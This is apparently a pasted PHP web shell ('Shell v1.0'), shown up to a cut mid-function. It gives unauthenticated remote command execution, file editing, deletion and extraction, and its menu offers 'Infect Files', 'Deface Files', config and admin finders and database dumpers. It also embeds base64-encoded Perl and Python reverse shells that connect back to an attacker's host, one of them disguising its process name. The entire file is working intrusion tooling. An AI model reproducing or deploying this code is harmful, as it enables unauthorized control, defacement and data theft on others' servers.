· 6 years ago · Sep 01, 2019, 07:36 AM
1<?php
2//Shell v1.0
3
4//Set a few ini settings to help performance and experience
5//I'd suggest not editing these
6@ini_set("memory_limit","9999M");
7@ini_set("max_execution_time", "0");
8@ini_set("upload_max_filesize", "9999m");
9@ini_set("magic_quotes_gpc", "0");
10set_time_limit(0);
11error_reporting(0);
12
13//Style variables, edit to your liking.
14//Font style
15$fontcolor = "#FFFFFF";
16$fontsize = "13px";
17$fontweight = "normal";
18
19//Table sytle
20$tablebordercolor = "none";
21$tablebgcolor = "none";
22$tablehovercolor = "#E66C2C";
23
24//Textarea style
25$textareabgcolor = "#141414";
26$textareafontcolor = "#FFFFFF";
27$textareabordercolor = "#FF0000";
28
29//Input stlye
30$inputbgcolor = "#141414";
31$inputfontcolor = "#FFFFFF";
32$inputbordercolor = "#FF0000";
33
34//Link style
35$linkcolor = "#FF0000";
36$activelinkcolor = "#FF0000";
37$hoverlinkcolor = "#FFFFFF";
38$visitedlinkcolor = "#FF0000";
39
40//Nav bar tabs
41$currentfile = basename(__FILE__);
42$tabs = array(
43 "Domain Information" => "./".$currentfile."?domainInformation",
44 "Hash Generator" => "./".$currentfile."?hashGenerator",
45 "Search" => array(
46 "Search Files/Dirs" => "./".$currentfile."?search",
47 "Config Finder" => "./".$currentfile."?configFinder",
48 "Admin Finder" => "./".$currentfile."?adminFinder"
49 ),
50 "Mass" => array(
51 "Infect Files" => "./".$currentfile."?fileInfect",
52 "Deface Files" => "./".$currentfile."?fileDeface"
53 ),
54 "MySQL Dumper" => array(
55 "MySQL Dumper v2.1" => "./".$currentfile."?installMSD",
56 "MySQL Dumper v1.24.4" => "./".$currentfile."?installMSD2"
57 ),
58 "Back Connect" => array(
59 "Perl" => "./".$currentfile."?bcPerl",
60 "Python" => "./".$currentfile."?bcPython",
61 "PHP" => "./".$currentfile."?bcPHP"
62 ),
63 "System" => array(
64 "Users" => "./".$currentfile."?users",
65 "Processes" => "./".$currentfile."?processes",
66 "Memory" => "./".$currentfile."?memory",
67 "CPU" => "./".$currentfile."?cpu"
68 ),
69 "Shell" => array(
70 "Check Links" => "./".$currentfile."?checkLinks",
71 "Credits" => "./".$currentfile."?credits",
72 "Kill" => "./".$currentfile."?kill"
73 )
74 );
75
76$links = array(
77 "MSD1" => array(
78 "LINK" => "https://dl.dropbox.com/s/5c0ch3cn03s73kr/msdv2.zip",
79 "MD5" => "bfd2f24a2a32277cc4babbc42649b3c1",
80 "DESC" => "MySQL Dumper v2.1 By: Plum"
81 ),
82 "MSD2" => array(
83 "LINK" => "https://dl.dropbox.com/s/nerui8jax2p2fwf/msd1.24.4.zip",
84 "MD5" => "9948baad310e0a4be04bb3f20f89938c",
85 "DESC" => "MySQL Dumper v1.24.4 By: http://www.mysqldumper.net/"
86 ),
87 "BOOTSTRAPCSS" => array(
88 "LINK" => "https://dl.dropbox.com/s/cr4prh66oli27m2/bootstrap_navbar.css",
89 "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
90 "DESC" => "Bootstrap Nav Bar CSS"
91 ),
92 "BOOTSTRAPJS" => array(
93 "LINK" => "https://dl.dropbox.com/s/5fn4xs7niie5s8v/bootstrap-dropdown.js",
94 "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
95 "DESC" => "Bootstrap Dropdown JS"
96 ),
97 "BACKGROUND" => array(
98 "LINK" => "https://dl.dropbox.com/s/gir6etllsswdc91/background.png",
99 "MD5" => "ec548490a2fd381c41cf7a3c17b93500",
100 "DESC" => "Background image"
101 )
102 );
103
104//Some variables
105if(!@$_GET['dir']) {
106 $dir = CleanDir(getcwd());
107} else {
108 $dir = CleanDir($_GET['dir']);
109}
110$version = "1.0";
111$yourip = $_SERVER['REMOTE_ADDR'];
112$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
113$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
114$uname = php_uname();
115$serversoftware = $_SERVER['SERVER_SOFTWARE'];
116$gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
117$servername = $_SERVER['SERVER_NAME'];
118$serverip = $_SERVER['SERVER_ADDR'];
119$safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
120$openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
121$disabledfunc = ini_get('disable_functions');
122$phpversion = phpversion();
123$domain = $_SERVER['HTTP_HOST'];
124$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
125$syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
126$compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
127
128//Base64'd stuff
129$bcpl = "IyEvdXNyL2Jpbi9wZXJsIC13DQojIHBlcmwtcmV2ZXJzZS1zaGVsbCAtIEEgUmV2ZXJzZSBTaGVsbCBpbXBsZW1lbnRhdGlvbiBpbiBQRVJMDQojIENvcHlyaWdodCAoQykgMjAwNiBwZW50ZXN0bW9ua2V5QHBlbnRlc3Rtb25rZXkubmV0DQojDQojIEFkZGVkIGNvbW1hbmQgbGluZSBhcmd1bWVudHMgZm9yIGVhc3kgZXhlY3V0aW9uIH4gUGx1bQ0KIyBTb3JyeSBhYm91dCByZW1vdmluZyB0aGUgcmVzdCBvZiB0aGUgY29tbWVudHMuIA0KIyBUcnlpbmcgdG8gc2F2ZSBhcyBtdWNoIHNwYWNlIGFzIHBvc3NpYmxlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQp1c2Ugc3RyaWN0Ow0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0KdXNlIFBPU0lYOw0KbXkgJFZFUlNJT04gPSAiMS4wIjsNCm15ICRBUkdDPUBBUkdWOw0KDQojQ2hlY2sgaWYgYXJndW1lbnRzIGV4aXN0DQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQoNCiMgV2hlcmUgdG8gc2VuZCB0aGUgcmV2ZXJzZSBzaGVsbC4gIENoYW5nZSB0aGVzZS4NCm15ICRpcCA9ICRBUkdWWzBdOw0KbXkgJHBvcnQgPSAkQVJHVlsxXTsNCg0KIyBPcHRpb25zDQpteSAkZGFlbW9uID0gMTsNCm15ICRhdXRoICAgPSAwOyAjIDAgbWVhbnMgYXV0aGVudGljYXRpb24gaXMgZGlzYWJsZWQgYW5kIGFueSANCgkJIyBzb3VyY2UgSVAgY2FuIGFjY2VzcyB0aGUgcmV2ZXJzZSBzaGVsbA0KbXkgJGF1dGhvcmlzZWRfY2xpZW50X3BhdHRlcm4gPSBxciheMTI3XC4wXC4wXC4xJCk7DQoNCiMgRGVjbGFyYXRpb25zDQpteSAkZ2xvYmFsX3BhZ2UgPSAiIjsNCm15ICRmYWtlX3Byb2Nlc3NfbmFtZSA9ICIvdXNyL3NiaW4vYXBhY2hlIjsNCg0KIyBDaGFuZ2UgdGhlIHByb2Nlc3MgbmFtZSB0byBiZSBsZXNzIGNvbnNwaWNpb3VzDQokMCA9ICJbaHR0cGRdIjsNCg0KIyBBdXRoZW50aWNhdGUgYmFzZWQgb24gc291cmNlIElQIGFkZHJlc3MgaWYgcmVxdWlyZWQNCmlmIChkZWZpbmVkKCRFTlZ7J1JFTU9URV9BRERSJ30pKSB7DQoJY2dpcHJpbnQoIkJyb3dzZXIgSVAgYWRkcmVzcyBhcHBlYXJzIHRvIGJlOiAkRU5WeydSRU1PVEVfQUREUid9Iik7DQoNCglpZiAoJGF1dGgpIHsNCgkJdW5sZXNzICgkRU5WeydSRU1PVEVfQUREUid9ID1+ICRhdXRob3Jpc2VkX2NsaWVudF9wYXR0ZXJuKSB7DQoJCQljZ2lwcmludCgiRVJST1I6IFlvdXIgY2xpZW50IGlzbid0IGF1dGhvcmlzZWQgdG8gdmlldyB0aGlzIHBhZ2UiKTsNCgkJCWNnaWV4aXQoKTsNCgkJfQ0KCX0NCn0gZWxzaWYgKCRhdXRoKSB7DQoJY2dpcHJpbnQoIkVSUk9SOiBBdXRoZW50aWNhdGlvbiBpcyBlbmFibGVkLCBidXQgSSBjb3VsZG4ndCBkZXRlcm1pbmUgeW91ciBJUCBhZGRyZXNzLiAgRGVueWluZyBhY2Nlc3MiKTsNCgljZ2lleGl0KDApOw0KfQ0KDQojIEJhY2tncm91bmQgYW5kIGRpc3NvY2lhdGUgZnJvbSBwYXJlbnQgcHJvY2VzcyBpZiByZXF1aXJlZA0KaWYgKCRkYWVtb24pIHsNCglteSAkcGlkID0gZm9yaygpOw0KCWlmICgkcGlkKSB7DQoJCWNnaWV4aXQoMCk7ICMgcGFyZW50IGV4aXRzDQoJfQ0KDQoJc2V0c2lkKCk7DQoJY2hkaXIoJy8nKTsNCgl1bWFzaygwKTsNCn0NCg0KIyBNYWtlIFRDUCBjb25uZWN0aW9uIGZvciByZXZlcnNlIHNoZWxsDQpzb2NrZXQoU09DSywgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSk7DQppZiAoY29ubmVjdChTT0NLLCBzb2NrYWRkcl9pbigkcG9ydCxpbmV0X2F0b24oJGlwKSkpKSB7DQoJY2dpcHJpbnQoIlNlbnQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsNCgljZ2lwcmludHBhZ2UoKTsNCn0gZWxzZSB7DQoJY2dpcHJpbnQoIkNvdWxkbid0IG9wZW4gcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQ6ICQhIik7DQoJY2dpZXhpdCgpOwkNCn0NCg0KIyBSZWRpcmVjdCBTVERJTiwgU1RET1VUIGFuZCBTVERFUlIgdG8gdGhlIFRDUCBjb25uZWN0aW9uDQpvcGVuKFNURElOLCAiPiZTT0NLIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLIik7DQpvcGVuKFNUREVSUiwiPiZTT0NLIik7DQokRU5WeydISVNURklMRSd9ID0gJy9kZXYvbnVsbCc7DQpzeXN0ZW0oInc7dW5hbWUgLWE7aWQ7cHdkIik7DQpleGVjKHsiL2Jpbi9zaCJ9ICgkZmFrZV9wcm9jZXNzX25hbWUsICItaSIpKTsNCg0KIyBXcmFwcGVyIGFyb3VuZCBwcmludA0Kc3ViIGNnaXByaW50IHsNCglteSAkbGluZSA9IHNoaWZ0Ow0KCSRsaW5lIC49ICI8cD5cbiI7DQoJJGdsb2JhbF9wYWdlIC49ICRsaW5lOw0KfQ0KDQojIFdyYXBwZXIgYXJvdW5kIGV4aXQNCnN1YiBjZ2lleGl0IHsNCgljZ2lwcmludHBhZ2UoKTsNCglleGl0IDA7ICMgMCB0byBlbnN1cmUgd2UgZG9uJ3QgZ2l2ZSBhIDUwMCByZXNwb25zZS4NCn0NCg0KIyBGb3JtIEhUVFAgcmVzcG9uc2UgdXNpbmcgYWxsIHRoZSBtZXNzYWdlcyBnYXRoZXJlZCBieSBjZ2lwcmludCBzbyBmYXINCnN1YiBjZ2lwcmludHBhZ2Ugew0KCXByaW50ICJDb250ZW50LUxlbmd0aDogIiAuIGxlbmd0aCgkZ2xvYmFsX3BhZ2UpIC4gIlxyDQpDb25uZWN0aW9uOiBjbG9zZVxyDQpDb250ZW50LVR5cGU6IHRleHRcL2h0bWxcclxuXHJcbiIgLiAkZ2xvYmFsX3BhZ2U7DQp9";
130$bcpy = "IyEgL3Vzci9iaW4vZW52IHB5dGhvbg0KDQojIENvcHlyaWdodCAoYykgMjAxMSBYYXZpZXIgR2FyY2lhIHd3dy5zaGVsbGd1YXJkaWFucy5jb20NCiMgQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiMNCiMgIEJhc2VkIG9uIHRoZSBQeXRob24gY29ubmVjdCBiYWNrIHNoZWxsIHdyaXR0ZW4gYnkgRGF2aWQgS2VubmVkeQ0KIyAgaHR0cDovL3d3dy5zZWNtYW5pYWMuY29tL2p1bmUtMjAxMS9jcmVhdGluZy1hLTEzLWxpbmUtYmFja2Rvb3Itd29ycnktZnJlZS1vZi1hdi8NCiMNCiMgQWRkZWQgY29tbWFuZCBsaW5lIGFyZ3VtZW50cyBmb3IgZWFzeSBleGVjdXRpb24NCiMgU29ycnkgYWJvdXQgcmVtb3ZpbmcgdGhlIHJlc3Qgb2YgdGhlIGNvbW1lbnRzDQojIFRyeWluZyB0byBzYXZlIHNwYWNlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQppbXBvcnQgc29ja2V0DQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCg0KaWYgbGVuKHN5cy5hcmd2KSA8IDM6DQoJcHJpbnQoJ1VzYWdlOiBweXRob24gJytzeXMuYXJndlswXSsnIDxJUD4gPFBPUlQ+JykNCglwcmludCgnRXhhbXBsZTogcHl0aG9uICcrc3lzLmFyZ3ZbMF0rJyAxMjcuMC4wLjEgMjEyMScpDQoJc3lzLmV4aXQoKQ0KDQpIT1NUID0gc3lzLmFyZ3ZbMV0gICAgIyBUaGUgcmVtb3RlIGhvc3QNClBPUlQgPSBpbnQoc3lzLmFyZ3ZbMl0pICAgIyBUaGUgc2FtZSBwb3J0IGFzIHVzZWQgYnkgdGhlIHNlcnZlcg0KDQpkZWYgY29ubmVjdCgoaG9zdCwgcG9ydCkpOg0KCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQoJcy5jb25uZWN0KChob3N0LCBwb3J0KSkNCglyZXR1cm4gcw0KDQpkZWYgd2FpdF9mb3JfY29tbWFuZChzKToNCglkYXRhID0gcy5yZWN2KDEwMjQpDQoJaWYgZGF0YSA9PSAiZXhpdFxuIjoNCgkJcy5jbG9zZSgpDQoJCXN5cy5leGl0KDApDQoJIyB0aGUgc29ja2V0IGRpZWQNCgllbGlmIGxlbihkYXRhKT09MDoNCgkJcmV0dXJuIFRydWUNCgllbHNlOg0KCQkjIGRvIHNoZWxsIGNvbW1hbmQNCgkJcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oZGF0YSwgc2hlbGw9VHJ1ZSwNCgkJCXN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsDQoJCQlzdGRpbj1zdWJwcm9jZXNzLlBJUEUpDQoJCSMgcmVhZCBvdXRwdXQNCgkJc3Rkb3V0X3ZhbHVlID0gcHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpDQoJCSMgc2VuZCBvdXRwdXQgdG8gYXR0YWNrZXINCgkJcy5zZW5kKHN0ZG91dF92YWx1ZSkNCgkJcmV0dXJuIEZhbHNlDQoNCmRlZiBtYWluKCk6DQoJd2hpbGUgVHJ1ZToNCgkJc29ja2VkX2RpZWQ9RmFsc2UNCgkJdHJ5Og0KCQkJcz1jb25uZWN0KChIT1NULFBPUlQpKQ0KCQkJd2hpbGUgbm90IHNvY2tlZF9kaWVkOg0KCQkJCXNvY2tlZF9kaWVkPXdhaXRfZm9yX2NvbW1hbmQocykNCgkJCXMuY2xvc2UoKQ0KCQlleGNlcHQgc29ja2V0LmVycm9yOg0KCQkJcGFzcw0KCQl0aW1lLnNsZWVwKDUpDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoJc3lzLmV4aXQobWFpbigpKQ==";
131
132//Some functions
133function CleanDir($directory) {
134 $directory = str_replace("\\", "/", $directory);
135 $directory = str_replace("//", "/", $directory);
136 return $directory;
137}
138
139function ByteConversion($bytes, $precision = 2) {
140 $kilobyte = 1024;
141 $megabyte = $kilobyte * 1024;
142 $gigabyte = $megabyte * 1024;
143 $terabyte = $gigabyte * 1024;
144
145 if (($bytes >= 0) && ($bytes < $kilobyte)) {
146 return $bytes . ' B';
147 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
148 return round($bytes / $kilobyte, $precision) . ' KB';
149 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
150 return round($bytes / $megabyte, $precision) . ' MB';
151 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
152 return round($bytes / $gigabyte, $precision) . ' GB';
153 } elseif ($bytes >= $terabyte) {
154 return round($bytes / $terabyte, $precision) . ' TB';
155 } else {
156 return $bytes . ' B';
157 }
158}
159
160function success($message) {
161 echo "<center><font color='green' size='5'><b>$message</b></font></center>";
162}
163
164function error($message) {
165 echo "<center><font color='red' size='5'><b>$message</b></font></center>";
166}
167
168function redirect($url) {
169 echo "<script>window.location = '$url';</script>";
170}
171
172function mass_files($mass_dir, $justdirs) {
173 if($dh = opendir($mass_dir)) {
174 $files = array();
175 $inner_files = array();
176 while($file = readdir($dh)) {
177 if($file != "." && $file != ".." && $file[0] != '.') {
178 if(is_dir($mass_dir . "/" . $file)) {
179 $inner_files = mass_files("$mass_dir/$file", $justdirs);
180 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
181 if($justdirs) { array_push($files, "$mass_dir/$file"); }
182 } else {
183 if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
184 }
185 }
186 }
187 closedir($dh);
188 return $files;
189 }
190}
191
192function can_exe() {
193 global $disabledfunc;
194 global $syscoms;
195 $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
196 if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
197 return false;
198 } else {
199 return true;
200 }
201}
202
203function exe_cmd($command) {
204 global $dir;
205 chdir($dir);
206 if(function_exists('proc_open')) {
207 $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
208 $result = "";
209 while (!feof($io[1])) {
210 $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
211 }
212 while (!feof($io[2])) {
213 $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
214 }
215 fclose($io[1]);
216 fclose($io[2]);
217 proc_close($execute);
218 return $result;
219 } elseif(function_exists('system')) {
220 $result = system($command);
221 return $result;
222 } elseif(function_exists('exec')) {
223 $result = exec($command);
224 return $result;
225 } elseif(functions_exists('shell_exec')) {
226 $result = shell_exec($command);
227 return $result;
228 } elseif(function_exists('passthru')) {
229 $result = passthru($command);
230 return $result;
231 }
232}
233
234function salt_gen($length) {
235 $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
236 $i = 0;
237 $salt = "";
238 while($i < $length) {
239 $arrand = array_rand($characters, 1);
240 $salt .= $characters[$arrand];
241 $i++;
242 }
243 return $salt;
244}
245
246function extract_file($filepath, $extractpath, $type) {
247 if($type == 'zip') {
248 if(class_exists('ZipArchive')) {
249 $newzip = new ZipArchive;
250 $open = $newzip->open($filepath);
251 if($open == true) {
252 $newzip->extractTo($extractpath);
253 $newzip->close();
254 redirect("?dir=$extractpath");
255 } else {
256 error('Failed to open zip archive!');
257 }
258 } else {
259 if(can_exe()) {
260 error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
261 echo "<center>
262 The response from 'unzip $filepath -d $extractpath' was:<br>
263 <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
264 </center>";
265 } else {
266 error('Zip archive does not exist and commands can not be executed!');
267 }
268 }
269 } elseif($type == 'tar') {
270 if(class_exists('PharData')) {
271 $newphar = new PharData($filepath);
272 $newphar->extractTo($extractpath);
273 unlink($filepath);
274 redirect("?dir=$extractpath");
275 } else {
276 if(can_exe()) {
277 error('PharData class does not exist!<br>Trying to extract via sys commands');
278 echo "<center>
279 The response from 'tar xvf $filepath -C $extractpath' was:<br>
280 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
281 </center>";
282 } else {
283 error('PharData class does not exist and commands can not be executed!');
284 }
285 }
286 } elseif($type == 'gz') {
287 if(function_exists('gzopen')) {
288 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
289 $open = gzopen($filepath, "rb");
290
291 while($contents = gzread($open, 4096)) {
292 file_put_contents($decomname, $contents, FILE_APPEND);
293 }
294 gzclose($open);
295 redirect("?dir=$extractpath");
296 } else {
297 if(can_exe()) {
298 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
299 error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
300 echo "<center>
301 The response from 'gunzip -c $filepath > $decomname' was:<br>
302 <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
303 </center>";
304 } else {
305 error('Zlib does not seem to be enabled and commands can not be executed!');
306 }
307 }
308 } elseif($type == 'tgz') {
309 if(class_exists('PharData')) {
310 $newphar = new PharData($filepath);
311 $newphar->decompress();
312
313 $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
314 $newphar->extractTo($extractpath);
315 unlink($filepath);
316 unlink(str_replace(".tgz", ".tar", $filepath));
317 redirect("?dir=$extractpath");
318 } else {
319 if(can_exe()) {
320 error('PharData class does not exist!<br>Trying to extract via sys commands.');
321 echo "<center>
322 The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
323 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
324 </center>";
325 } else {
326 error('PharData class does not exist and commands can not be executed!');
327 }
328 }
329 } elseif($type == 'rar') {
330 if(class_exists('RarArchive')) {
331 $openrar = RarArchive::open($filepath);
332
333 if($raropen == true) {
334 $entries = $openrar->getEntries();
335 foreach($entries as $files) {
336 $files->extract($extractpath);
337 }
338 $openrar->close();
339 } else {
340 error('Failed to open rar file!');
341 $openrar->close();
342 }
343 } else {
344 if(can_exe()) {
345 error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
346 echo "<center>
347 The response from 'unrar x $filepath $extractpath' was:<br>
348 <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
349 </center>";
350 } else {
351 error('RarArchive class does not exist and commands can not be executed!');
352 }
353 }
354 }
355}
356
357//Let's initiailize the stylesheet
358echo "
359<link rel='stylesheet' type='text/css' href='".$links['BOOTSTRAPCSS']['LINK']."'>
360<script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
361<script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
362<style>
363body {
364 background: #141414 url('".$links['BACKGROUND']['LINK']."');
365 color: $fontcolor;
366 padding-top: 100px !important;
367 margin:0;
368 font-family:\"Helvetica Neue\",Helvetica,Arial,sans-serif;
369 font-size:$fontsize;
370 font-weight:$fontweight;
371}
372table{
373 border-color: $tablebordercolor;
374 background-color: $tablebgcolor;
375}
376#hover tr:hover{
377 background-color: $tablehovercolor;
378}
379textarea {
380 background-color: $textareabgcolor;
381 resize:none;
382 color: $textareafontcolor;
383 border-color: $textareabordercolor;
384 outline: none;
385}
386input {
387 background-color: $inputbgcolor;
388 resize:none;
389 color: $inputfontcolor;
390 border-color: $inputbordercolor;
391 outline: none;
392}
393a:link {color: $linkcolor; text-decoration: none; }
394a:active {color: $activelinkcolor; text-decoration: none; }
395a:visited {color: $visitedlinkcolor; text-decoration: none; }
396a:hover {color: $hoverlinkcolor; text-decoration: none; }
397</style>";
398
399//Let's display nav bar
400echo <<<html
401<script>
402 $(window).load(function(){
403 $('#topbar').dropdown();
404 });
405</script>
406<div class="topbar" id="topbar">
407 <div class="fill">
408 <div class="container">
409 <a class="brand" href="./$currentfile">Home</a>
410 <ul class="nav">
411html;
412foreach($tabs as $title => $link) {
413 if(is_array($link)) {
414 echo '<li class="menu">
415 <a href="#" class="menu">'.$title.'</a>
416 <ul class="menu-dropdown">';
417 foreach($link as $dtitle => $dlink) {
418 echo "<li><a href='$dlink'>$dtitle</a></li>";
419 }
420 echo "</ul>";
421 } else {
422 echo "<li><a href='$link'>$title</a></li>";
423 }
424}
425echo <<<html
426 </ul>
427 </div>
428 </div>
429</div>
430html;
431
432//Let's display system bar
433if(empty($disabledfunc)) {
434 $disabledfun = "None";
435} else {
436 $count = count(explode(",", $disabledfunc));
437 $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
438}
439echo <<<html
440<table width="100%" border="1">
441 <tr>
442 <th>Your IP</th>
443 <th>User</th>
444 <th>System</th>
445 <th>Server Software</th>
446 <th>Gateway Interface</th>
447 <th>PHP Version</th>
448 <th>Server Name</th>
449 <th>Server IP</th>
450 <th>safe_mode</th>
451 <th>open_basedir</th>
452 <th>Disabled Functions</th>
453 </tr>
454 <tr>
455 <td>$yourip</td>
456 <td>$whoami</td>
457 <td>$uname</td>
458 <td>$serversoftware</td>
459 <td>$gatewayinterface</td>
460 <td>$phpversion</td>
461 <td>$servername</td>
462 <td>$serverip</td>
463 <td>$safemode</td>
464 <td>$openbasedir</td>
465 <td>$disabledfun</td>
466 </tr>
467</table><br><br>
468html;
469
470//Anything to be displayed between the system bar and files should go here.
471
472//Read/Edit file stuff
473if(isset($_POST['save_file'])) {
474 $file = $_GET['edit'];
475 $newcontent = $_POST['edit_file'];
476 if(get_magic_quotes_gpc()) {
477 $newcontent = stripslashes($newcontent);
478 }
479 if(file_put_contents($file, $newcontent)) {
480 success("File has been saved successfully!");
481 } else {
482 error("File was not saved successfully!");
483 }
484}
485if(isset($_POST['delete_file'])) {
486 $file = $_GET['edit'];
487 if(unlink($file)) {
488 success("File was successfully deleted!");
489 } else {
490 error("File could not be deleted successfully!");
491 }
492}
493
494if(isset($_GET['delF'])) {
495 $file = $_GET['delF'];
496 if(unlink($file)) {
497 success("File was successfully deleted!");
498 } else {
499 error("File could not be deleted successfully!");
500 }
501}
502
503if(isset($_GET['delD'])) {
504 $ddir = $_GET['delD'];
505 if(can_exe()) {
506 echo "<center>
507 The response from 'rm -rf $ddir' was:<br>
508 <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
509 </center>";
510 } else {
511 if(rmdir($ddir)) {
512 success("Directory successfully deleted!");
513 } else {
514 error("Failed to delete directory!");
515 }
516 }
517}
518
519if(isset($_GET['edit'])) {
520 $file = $_GET['edit'];
521 if(file_exists($file)) {
522 $content = htmlspecialchars(file_get_contents($file));
523 if(!is_writeable($file)) {
524 echo "<center>
525 <font color='red' size=5>This file is read only!</font><br>
526 <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
527 </center>";
528 } else {
529 echo "<center>
530 <form action='' method='post'>
531 <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
532 <input type='submit' name='save_file' value='Save'>
533 <input type='submit' name='delete_file' value='Delete'>
534 </form>
535 </center>";
536 }
537 } else {
538 error("File does not exist!");
539 }
540}
541
542//Rename file stuff
543if(isset($_POST['rename'])) {
544 $newname = $_POST['new_name'];
545 $oldname = $_GET['rename'];
546 $rdir = $_GET['rdir'];
547 if(rename("$rdir/$oldname", "$rdir/$newname")) {
548 success("File was successfully renamed to: $newname");
549 } else {
550 error("File was not renamed!");
551 }
552}
553
554if(isset($_GET['rename'])) {
555 $oldname = $_GET['rename'];
556 echo "<center>
557 <form action='' method='post'>
558 Rename: <input type='text' name='new_name' value='$oldname'>
559 <input type='submit' name='rename' value='rename'>
560 </form>
561 </center>";
562}
563
564//Domain information stuff
565if(isset($_GET['domainInformation'])) {
566 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
567 $num = 0;
568 $count = sizeof($dns_record);
569 echo "<br>Name Servers:</b><br>";
570 while($num < $count) {
571 $name_servers = $dns_record[$num];
572 $name_servers2 = $name_servers['type'];
573 $name_servers3 = @$name_servers['target'];
574 $num++;
575 if($name_servers2 == "NS") {
576 echo "$name_servers3<br>";
577 $nshost = @$name_servers['host'];
578 }
579 if($name_servers2 == "SOA") {
580 $nsemail = $name_servers['rname'];
581 }
582 if($name_servers2 == "A") {
583 $nsip = $name_servers['ip'];
584 }
585 }
586 echo "<br><table class='noborder'>
587 <tr>
588 <td><b>Host:</b></td>
589 <td>$nshost</td>
590 </tr>
591 <tr>
592 <td><b>IP:</b></td>
593 <td>$nsip</td>
594 </tr>
595 <tr>
596 <td><b>Email:</b></td>
597 <td>$nsemail</td>
598 </tr>
599 </table><br>";
600 $num = 0;
601 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
602 $status = $domains_on_server->status;
603 $message = $domains_on_server->message;
604 $domainAr = $domains_on_server->domainArray;
605 $num_of_site = $domains_on_server->domainCount;
606 $count = sizeof($domainAr);
607 if($status == "Success") {
608 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
609 while($num < $count) {
610 $hossites = $domainAr[$num];
611 $num++;
612 $hossites3 = $domainAr[$num];
613 $hossites3 = $hossites3[0];
614 $hossites = $hossites[0];
615 $site_ips = empty($hossites) ? "" : "(" .gethostbyname($hossites). ")";
616 $site_ips2 = empty($hossites3) ? "" : "(" .gethostbyname($hossites3). ")";
617 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
618 $num++;
619 }
620 echo "</table><br>";
621 $num = 0;
622 } else {
